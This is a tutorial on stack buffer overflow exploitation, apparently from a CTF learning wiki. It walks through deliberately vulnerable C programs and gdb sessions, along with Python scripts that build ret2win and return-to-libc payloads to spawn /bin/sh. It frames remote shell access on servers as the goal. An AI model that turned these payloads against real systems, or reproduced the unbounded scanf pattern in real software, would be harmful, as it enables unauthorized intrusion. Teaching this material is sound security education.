## Bring on the shell!

Right, so you just redirected the control flow to execute the win function. Previously, win() just printed “Win” to the screen. Now consider the same stack-example.c file, but this time with a different definition of win.

```c
/* stack-example-shell.c */
#include <stdio.h>   /* scanf, printf */
#include <stdlib.h>  /* system, exit */

void win()
{
    system("/bin/sh");
    exit(0);
}

void vuln()
{
    char arr[0x10];
    scanf("%s",arr);
    printf("Input : %s",arr);
}

int main()
{
    vuln();
    return 0;
}
```

Binary file: stack-example-shell

Before we even go into disassembling this, what do you think the system function does? It executes a shell command. The argument passed to it is "/bin/sh", so the statement system("/bin/sh") is equivalent to typing /bin/sh in the terminal. Let’s do exactly that and type /bin/sh in the terminal. What did you get? This is a shell, similar to bash but less advanced. Try typing commands like pwd, ls and whoami and observe the output. Thus we can see that system("/bin/sh") will land us a shell.

Now let’s see the disassembly of vuln -

```
   0x0804846b <+0>:     push   ebp
   0x0804846c <+1>:     mov    ebp,esp
   0x0804846e <+3>:     sub    esp,0x10
   0x08048471 <+6>:     lea    eax,[ebp-0x10]
   0x08048474 <+9>:     push   eax
   0x08048475 <+10>:    push   0x8048530
   0x0804847a <+15>:    call   0x8048350 <__isoc99_scanf@plt>
   0x0804847f <+20>:    add    esp,0x8
   0x08048482 <+23>:    lea    eax,[ebp-0x10]
   0x08048485 <+26>:    push   eax
   0x08048486 <+27>:    push   0x8048533
   0x0804848b <+32>:    call   0x8048330 <printf@plt>
   0x08048490 <+37>:    add    esp,0x8
   0x08048493 <+40>:    nop
   0x08048494 <+41>:    leave
   0x08048495 <+42>:    ret
```

As you can see, arr starts at ebp-0x10, so this time we only have to give 0x10 bytes of junk data and then 4 more bytes for the saved ebp to reach the saved eip. After that we overwrite the saved eip with the address of win. Let’s find the address of win first -

```
(gdb) info functions win
All functions matching regular expression "win":

Non-debugging symbols:
0x080484cb  win
```

Now let’s write the payload and send it.

```
(gdb) ! python -c 'print "A"*0x14+"\xcb\x84\x04\x08"' > /tmp/inp
(gdb) b*vuln+42
Breakpoint 1 at 0x804850c
(gdb) r < /tmp/inp
Starting program: /home/vignesh/Documents/stack-example-shell < /tmp/inp

Breakpoint 1, 0x0804850c in vuln ()
(gdb) si
0x080484cb in win ()
```
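The four bytes after the padding are the address of win written least-significant byte first, because x86 is little-endian. Here is a minimal Python 3 sketch of the same payload, with `struct.pack` taking care of the byte order. The names `BUF_SIZE`, `SAVED_EBP_SIZE`, `WIN_ADDR` and `build_payload` are illustrative and do not come from the original files.

```python
import struct

BUF_SIZE = 0x10          # arr sits at ebp-0x10 in vuln
SAVED_EBP_SIZE = 4       # the saved ebp lies between arr and the saved eip
WIN_ADDR = 0x080484cb    # taken from "info functions win"


def build_payload(target_addr):
    """Return the padding up to the saved eip followed by the new return address."""
    padding = b"A" * (BUF_SIZE + SAVED_EBP_SIZE)
    # "<I" means little-endian, unsigned, 32 bits
    return padding + struct.pack("<I", target_addr)


if __name__ == "__main__":
    print(build_payload(WIN_ADDR))
```

Writing the address as a number and packing it avoids mistakes when reversing the bytes by hand.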

Outside gdb, we can get a proper shell. Running ./stack-example-shell < /tmp/inp does spawn the shell, but the shell closes before you can give any input, because it hits end-of-file as soon as the redirected input is used up. To keep the shell open you can do this -

```
(cat /tmp/inp;cat) | ./stack-example-shell
ls
stack-example-shell  stack-example-shell.c
```

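The first cat /tmp/inp sends the payload, and the second cat, run without arguments, forwards whatever you type to the program, which keeps the shell’s input open. The pipe connects the output of both commands to the standard input of the binary.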
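The same idea can be scripted: send the payload first, then keep writing to the standard input of the process. The sketch below is a rough Python 3 analogue of the two cat commands, not a replacement for them. `feed` is a hypothetical helper, and the short pause is an assumption: it gives the target time to consume the payload before the shell commands arrive, since otherwise the buffered scanf in the target may swallow them.

```python
import subprocess
import time


def feed(argv, payload, commands, pause=0.2):
    """Send payload, wait briefly, then send commands; return everything printed."""
    proc = subprocess.Popen(argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    proc.stdin.write(payload)
    proc.stdin.flush()
    time.sleep(pause)            # assumption: enough time for the target to read the payload
    proc.stdin.write(commands)   # these bytes are meant for the spawned shell
    proc.stdin.close()           # end-of-file, like pressing Ctrl-D in the second cat
    output = proc.stdout.read()
    proc.wait()
    return output
```

With the files from this section, a call could look like `feed(["./stack-example-shell"], open("/tmp/inp", "rb").read(), b"whoami\n")`.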

So, how is getting the binary to spawn a shell a step up from a simple printf statement? Well, so far we ran the binary and the exploit locally on our own system. Now imagine that the binary is hosted on a server somewhere and you send the payload as its input. What happens? Yes, you get a shell on the server! With the shell, you can do almost anything on the server. Thus in most cases, our aim will be to redirect control flow and get a shell.

Every time you write a C program, you are sure to use some of the built-in functions, like printf, scanf and puts. Have you wondered where the definitions of these functions lie? All the standard C functions are compiled into a single file, called the standard C library or the libc. A libc is native to the system that you are working on and is independent of the binary (the compiled program). You can use the ldd command to find out which libc is being used by an application.

```
$ ldd ./ret2libc
        linux-gate.so.1 =>  (0xf76df000)
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf74fd000)
        /lib/ld-linux.so.2 (0xf76e0000)
```

Thus /lib/i386-linux-gnu/libc.so.6 is the libc that is being used by the binary. The libc is ‘linked’ to the binary at execution time. Thus, if you just load a binary into gdb and then try disas puts, you will not get the actual disassembly of the puts function. This is because the program is not running yet, so the libc is not loaded. Once the program is running, you can see the full disassembly of puts or of any other libc function.

```
(gdb) disas puts          ←-No libc loaded thus puts will not exist right now
No symbol table is loaded.  Use the "file" command.
(gdb) start               ←-Start executing the binary. Libc gets loaded now
Temporary breakpoint 1 at 0x8048499
Starting program: /home/vignesh/Documents/a.out

Temporary breakpoint 1, 0x08048499 in main ()
(gdb) disas puts          ←-Now libc is loaded and thus puts exists
Dump of assembler code for function _IO_puts:
   0xf7e55ca0 <+0>:     push   ebp
   0xf7e55ca1 <+1>:     mov    ebp,esp
   0xf7e55ca3 <+3>:     push   edi
   0xf7e55ca4 <+4>:     push   esi
   0xf7e55ca5 <+5>:     push   ebx
   ....
```

Understanding the libc is important from an exploitation point of view, because we can redirect the control flow to libc functions, as we will see in the following section. Since a libc file is native to a system, each of us can have a different libc file. So that the libc addresses used in this wiki match the ones you see when you try out the challenges yourself, we will provide the libc file along with the binary. To run programs with a libc file other than your host libc, you can use the LD_PRELOAD environment variable.
For example, if you want to use a libc - libc.so - instead of your original one, you can set LD_PRELOAD to the path of the libc file

```
$ ls
a.out  libc.so
$ export LD_PRELOAD=./libc.so
```

Within gdb, you can set LD_PRELOAD like this -

```
(gdb) set environment LD_PRELOAD=./libc.so
```

## Return-to-libc

So now you know what a buffer overflow vulnerability is and also how to use it to control the flow of the application and execute code at an address of our choice. In the previous section, we directed the control flow to execute a function called win. With the help of this function we spawned a shell.

But you might be wondering, surely no real world programs would contain such helpful functions like our ‘win’? Well, you are right there. But what most applications do have access to is the standard C shared library, or ‘libc’. The libc contains all the standard functions that can be used by any C program. The ‘win’ function used previously actually called the C function ‘system’, which executes a shell command. The system function, as already mentioned, is a standard C function, which means that it will surely exist in the libc. If you check out the man page of ‘system’, you will notice that the argument is actually a pointer to the command to be executed. The string "/bin/sh" will also be present in the libc, so getting a pointer to it is just a matter of noting the address of this string.

So before proceeding further, let’s get our aim clear. We want to exploit a simple buffer overflow bug, the same as in the previous section, but this time there will be no ‘win’ type functions to make life easy for us. For our example, the aim will be to get our vulnerable application to spawn a shell. Thus we need to overwrite the return address with the address of the ‘system’ function and provide a pointer to "/bin/sh" as its argument.

Ok, three paras of theory is more than enough! Let’s get our hands dirty now. We’ll use the same code as in the previous section, but without the win function.
```c
/* ret2libc.c */
#include <stdio.h>   /* scanf, printf */

void vuln()
{
    char arr[0x10];
    scanf("%s",arr);
    printf("Input : %s",arr);
}

int main()
{
    vuln();
    return 0;
}
```

Binary file: ret2libc

libc: libc.so.6

First let’s take a look at the disassembly of main -

```
   0x08048496 <+0>:     push   ebp
   0x08048497 <+1>:     mov    ebp,esp
   0x08048499 <+3>:     call   0x804846b <vuln>
   0x0804849e <+8>:     mov    eax,0x0
   0x080484a3 <+13>:    pop    ebp
   0x080484a4 <+14>:    ret
```

Now here’s the disassembly of vuln -

```
   0x0804846b <+0>:     push   ebp
   0x0804846c <+1>:     mov    ebp,esp
   0x0804846e <+3>:     sub    esp,0x10
   0x08048471 <+6>:     lea    eax,[ebp-0x10]
   0x08048474 <+9>:     push   eax
   0x08048475 <+10>:    push   0x8048530
   0x0804847a <+15>:    call   0x8048350 <__isoc99_scanf@plt>
   0x0804847f <+20>:    add    esp,0x8
   0x08048482 <+23>:    lea    eax,[ebp-0x10]
   0x08048485 <+26>:    push   eax
   0x08048486 <+27>:    push   0x8048533
   0x0804848b <+32>:    call   0x8048330 <printf@plt>
   0x08048490 <+37>:    add    esp,0x8
   0x08048493 <+40>:    nop
   0x08048494 <+41>:    leave
   0x08048495 <+42>:    ret
```

As you can see, we again have to give 0x10 bytes of junk data and then 4 more bytes for the saved ebp to reach the saved eip. Earlier we overwrote the saved eip with the address of the win function, but now we will overwrite it directly with the address of system. Here is how you find the address of system -

```
(gdb) start
Temporary breakpoint 1 at 0x8048499
Starting program: /home/vignesh/Documents/ret2libc

Temporary breakpoint 1, 0x08048499 in main ()
(gdb) print system
$1 = {<text variable, no debug info>} 0xf7e5a940 <system>
```

Thus the address of system is 0xf7e5a940. Let’s craft our input and then run the program with it.

```
(gdb) b*vuln+42
Breakpoint 1 at 0x8048495
(gdb) ! python -c 'print "A" * 0x14 + "\x40\xa9\xe5\xf7"' > /tmp/inp
(gdb) r < /tmp/inp
Starting program: /home/vignesh/Documents/ret2libc < /tmp/inp

Breakpoint 1, 0x08048495 in vuln ()
(gdb) x/i $eip
=> 0x8048495 <vuln+42>: ret
(gdb) si
0xf7e5a940 in system () from ./libc.so.6
```

Right, so we entered system. But what about the argument? Well, let’s fix that now. Do you remember how arguments are passed to a function in x86? Yes, they are pushed onto the stack, in reverse order, before the function is called. So once the function has set up its stack frame, its arguments are found at ebp+0x8, ebp+0xc, ebp+0x10 and so on, with ebp+0x4 holding the return address of the function.

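In our case, it is the ret instruction at the end of vuln that transfers control to system, rather than a call, so no return address gets pushed for us. The ret pops the address of system from the slot that originally held the saved eip, leaving esp pointing at the word just above it. A function with the usual prologue (push ebp; mov ebp,esp) would then save ebp into that same slot, so the slot that initially contained the saved eip, and now contains the address of system, is where ebp points while system is executing. The return address of system is therefore the word directly above it (i.e. 4 bytes higher), and then come the arguments. For us there is only one argument, the pointer to the string /bin/sh. Let’s find out the address of this string in the libc -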

```
(gdb) r < /tmp/inp

Breakpoint 1, 0x08048495 in vuln ()
(gdb) info proc map
process 16302
Mapped address spaces:

        Start Addr   End Addr       Size     Offset objfile
         0x8048000  0x8049000     0x1000        0x0 /home/vignesh/Documents/ret2libc
         0x8049000  0x804a000     0x1000        0x0 /home/vignesh/Documents/ret2libc
         0x804a000  0x804b000     0x1000     0x1000 /home/vignesh/Documents/ret2libc
         0x804b000  0x806d000    0x22000        0x0 [heap]
        0xf7e1f000 0xf7e20000     0x1000        0x0
        0xf7e20000 0xf7fcd000   0x1ad000        0x0 /home/vignesh/Documents/libc.so.6
        0xf7fcd000 0xf7fce000     0x1000   0x1ad000 /home/vignesh/Documents/libc.so.6
        0xf7fce000 0xf7fd0000     0x2000   0x1ad000 /home/vignesh/Documents/libc.so.6
        0xf7fd0000 0xf7fd1000     0x1000   0x1af000 /home/vignesh/Documents/libc.so.6
        0xf7fd1000 0xf7fd5000     0x4000        0x0
        0xf7fd5000 0xf7fd8000     0x3000        0x0 [vvar]
        0xf7fd8000 0xf7fd9000     0x1000        0x0 [vdso]
        0xf7fd9000 0xf7ffc000    0x23000        0x0 /lib/i386-linux-gnu/ld-2.23.so
        0xf7ffc000 0xf7ffd000     0x1000    0x22000 /lib/i386-linux-gnu/ld-2.23.so
        0xf7ffd000 0xf7ffe000     0x1000    0x23000 /lib/i386-linux-gnu/ld-2.23.so
        0xfffdd000 0xffffe000    0x21000        0x0 [stack]
(gdb) find 0xf7e20000, 0xf7fd1000 , "/bin/sh"
0xf7f78e8b
1 pattern found.
(gdb) x/s 0xf7f78e8b
0xf7f78e8b:     "/bin/sh"
```

We first find the starting and ending addresses of the libc with info proc map and then pass them to the find command as the range to search. Refer to the gdb documentation if the find command is unclear.
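What find does here can also be sketched outside gdb: search the bytes of the libc file for the NUL-terminated string and add the load address. This is a rough Python 3 sketch, assuming the string lies in the part of the file that is mapped at offset 0x0 from the base, as is the case for the first libc region in the map above. `find_string` is a hypothetical helper, and the demo uses stand-in bytes rather than a real libc.

```python
def find_string(libc_bytes, base, needle=b"/bin/sh\x00"):
    """Return the runtime address of needle, or None if it is absent.

    Assumes file offset == offset from the load address, which holds for
    data inside the first mapping (the one with Offset 0x0).
    """
    offset = libc_bytes.find(needle)
    if offset == -1:
        return None
    return base + offset


if __name__ == "__main__":
    # Stand-in bytes for demonstration only; with the real file you would
    # read libc.so.6 in binary mode and take the base from "info proc map".
    fake_libc = b"\x7fELF" + b"\x00" * 12 + b"/bin/sh\x00"
    print(hex(find_string(fake_libc, 0xf7e20000)))
```

With the values from this section, the string sits 0x158e8b bytes into the libc, since 0xf7f78e8b - 0xf7e20000 = 0x158e8b.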

Thus 0xf7f78e8b is a pointer to the string /bin/sh. Now let’s put together the whole exploit. Writing the exploit in a separate file, as a Python script, is a bit more convenient than writing it inline in gdb.

```python
''' exploit.py '''
inp  = b"A"*0x10            # The initial junk bytes to fill up the stack space
inp += b"A"*4               # To overwrite the saved ebp
inp += b"\x40\xa9\xe5\xf7"  # Overwrite the saved eip with the address of system
inp += b"AAAA"              # The return address of system. We do not care what happens after the shell exits, so junk is fine here.
inp += b"\x8b\x8e\xf7\xf7"  # The argument to system. This is the pointer to the string "/bin/sh"
# Byte strings and binary mode keep the raw bytes intact on both Python 2 and Python 3
with open("/tmp/inp", "wb") as f:  # Open /tmp/inp for writing and put inp in it
    f.write(inp)
''' run "python exploit.py" in the terminal to run this file '''
```

```
(gdb) r < /tmp/inp
Breakpoint 1, 0x08048495 in vuln ()
(gdb) c
process 17735 is executing new program: /bin/dash
```

Thus the program executed system with the argument “/bin/sh”, resulting in a shell.

Therefore we were able to execute a shell without any helper functions. Instead of system we can redirect the control flow to any standard C function. This technique is known as return-to-libc or ret2libc.
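The layout used in exploit.py can be written as a small helper that takes the target function and its argument as parameters. This is a minimal Python 3 sketch under the same assumptions as this section (32-bit x86, 0x14 bytes from the start of arr to the saved eip). `p32` and `build_ret2libc` are illustrative names, not part of the original script.

```python
import struct

SYSTEM_ADDR = 0xf7e5a940   # from "print system" in gdb
BINSH_ADDR = 0xf7f78e8b    # from the gdb find command


def p32(value):
    """Pack a 32-bit value in little-endian byte order."""
    return struct.pack("<I", value)


def build_ret2libc(func_addr, arg_addr, fake_ret=0x41414141, offset=0x14):
    """Lay out: padding | function address | its return address | first argument."""
    payload = b"A" * offset     # arr (0x10 bytes) plus the saved ebp (4 bytes)
    payload += p32(func_addr)   # replaces the saved eip of vuln
    payload += p32(fake_ret)    # where the function returns to (junk by default)
    payload += p32(arg_addr)    # first argument of the function
    return payload


if __name__ == "__main__":
    print(build_ret2libc(SYSTEM_ADDR, BINSH_ADDR))
```

Called with the two addresses found above, the helper produces the same bytes as exploit.py.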

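Unfortunately this exploit will not work outside gdb, due to a mitigation technique called Address Space Layout Randomization (ASLR). By default gdb disables ASLR for the programs it runs, so the libc addresses we noted stay the same between runs inside gdb, whereas outside gdb the libc is loaded at a different address on every run. We will discuss this mitigation and how to bypass it in later sections.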
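To see why hardcoded addresses break, note that each libc address used above is the load address of the libc plus a fixed offset. The Python 3 sketch below recomputes the two addresses for a given base. The offsets are derived from the gdb session in this section, `rebase` is a hypothetical helper, and the second base value is made up purely for illustration.

```python
GDB_LIBC_BASE = 0xf7e20000                  # libc start from "info proc map"
SYSTEM_OFFSET = 0xf7e5a940 - GDB_LIBC_BASE  # 0x3a940
BINSH_OFFSET = 0xf7f78e8b - GDB_LIBC_BASE   # 0x158e8b


def rebase(libc_base):
    """Return the addresses of system and "/bin/sh" for a libc loaded at libc_base."""
    return libc_base + SYSTEM_OFFSET, libc_base + BINSH_OFFSET


if __name__ == "__main__":
    for base in (GDB_LIBC_BASE, 0xf7d51000):   # the second base is hypothetical
        system_addr, binsh_addr = rebase(base)
        print(hex(base), hex(system_addr), hex(binsh_addr))
```

When the base changes from run to run, the addresses baked into /tmp/inp no longer point at system or at the string.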